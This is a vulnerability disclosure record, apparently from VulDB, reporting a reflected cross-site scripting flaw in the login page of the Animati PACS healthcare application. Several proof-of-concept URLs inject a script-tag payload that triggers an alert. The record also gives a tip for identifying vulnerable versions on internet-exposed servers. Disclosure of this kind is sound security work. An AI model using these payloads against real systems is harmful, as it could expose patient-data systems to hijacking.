| Title | Animati PACS v1.24.10.16.01~1.24.12.09.03 Cross Site Scripting |
|---|
| Description | An XSS vulnerability has been identified in the PACS service, which is a healthcare management application.
Below are some examples of targets exposed on the internet. To view version and build information, simply press Ctrl+U and search the source code for "Versão".
Pocs:
https://example.com/login?p=19648"();}]9656</script><script>alert('c4ng4c3ir0')</script>
https://example.com/login?p=19648%22();}]9656%3C/script%3E%3Cscript%3Ealert('c4ng4c3ir0')%3C/script%3E
https://x.x.x.x/login?p=19648%22();}]9656%3C/script%3E%3Cscript%3Ealert('c4ng4c3ir0')%3C/script%3E
https://example.com/login?p=19648%22();}]9656%3C/script%3E%3Cscript%3Ealert('c4ng4c3ir0')%3C/script%3E |
|---|
| Source | ⚠️ https://site.com/login?p=19648%22();}]9656%3C/script%3E%3Cscript%3Ealert('c4ng4c3ir0')%3C/script%3E |
|---|
| User | c4ng4c3ir0 (UID 38456) |
|---|
| Submission | 01/27/2025 04:50 (1 Year ago) |
|---|
| Moderation | 02/06/2025 15:35 (10 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 294861 [Animati PACS up to 1.24.12.09.03 /login cross site scripting] |
|---|
| Points | 20 |
|---|